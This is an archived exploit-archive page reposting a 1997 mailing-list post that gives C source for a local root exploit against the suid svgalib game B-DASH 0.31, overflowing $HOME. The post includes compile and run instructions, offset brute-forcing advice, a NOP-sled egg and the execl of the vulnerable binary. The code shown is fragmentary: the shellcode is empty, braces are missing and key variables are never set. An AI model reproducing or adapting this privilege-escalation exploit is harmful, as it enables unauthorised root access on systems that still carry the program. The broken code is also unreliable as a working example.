B-DASH 0.31 $HOME overflow

Description:Standard pathetic suid-for-svgalab-totally-insecure application overflow.
Author:Nicolas Dubee <dube0866@EUROBRETAGNE.FR>
Compromise: root (local)
Vulnerable Systems:Mostly old versions of Linux. Possibly current Slackware. Anything with B-DASH v0.31
Date:21 June 1997 was when he posted his OLD exploit, ignore the date in the header, it is bogus.

Date: Sat, 1 Jan 1994 03:00:59 +0100
From: Nicolas Dubee <dube0866@EUROBRETAGNE.FR>

hello all,

I've decided to spread my old exploits, so for a beginning
here is a really old one (sorry if it's known stuff): you have
guessed, this is a buffer overflow, this time it's with
an old svgalib (-> suid root) game: B-DASH 0.31.
It can still be found on some distributions of Linux
(Slackware ?, not Redhat).
The overflow comes with the $HOME environment variable, in
the vconfig() function (vconfig.c).

I included the exploit code below, it should be harmless since
b-dash is quite old.



   plaguez / libpcap

// bdexp.c

 *   B-DASH 0.31 buffer overflow
 *    by   plaguez
 *         dube0866@eurobretagne.fr
 *         http://www.innu.org
 *  compile:   cc bdexp.c -o bdexp
 *  exec:      ./bdexp 8
 *         or  ./bdexp 4
 *         or  ./bdexp 24 ...
 *  you may want to brute-force the offset (argv[1])

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define EGGSIZE 2048

char *shellcode =

unsigned long get_sp() {
   asm("movl %esp,%eax");

char *buffer;
char *egg;

main(int argc,char **argv) {
   int i;
   int bsize=1124,offset;
   long *adpt;
   char *pt;

        printf("\nusage  %s <offset>",argv[0]);
   egg=(char *)malloc(EGGSIZE);
   buffer=(char *)malloc(bsize);

   adpt=(long *) pt;
   for (i = 0; i <= bsize-4; i += 4)
    *(adpt++) = get_sp() - offset;

   memset(egg, 0x90,EGGSIZE);
   memcpy(&egg[EGGSIZE-strlen(shellcode)-2], shellcode, strlen(shellcode));

   egg[EGGSIZE-1] = 0;

   setenv("HOME", buffer, 1);

   printf("\nb-dashing ...\n");
   execl("/usr/games/bdash", "/usr/games/bdash", NULL);

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: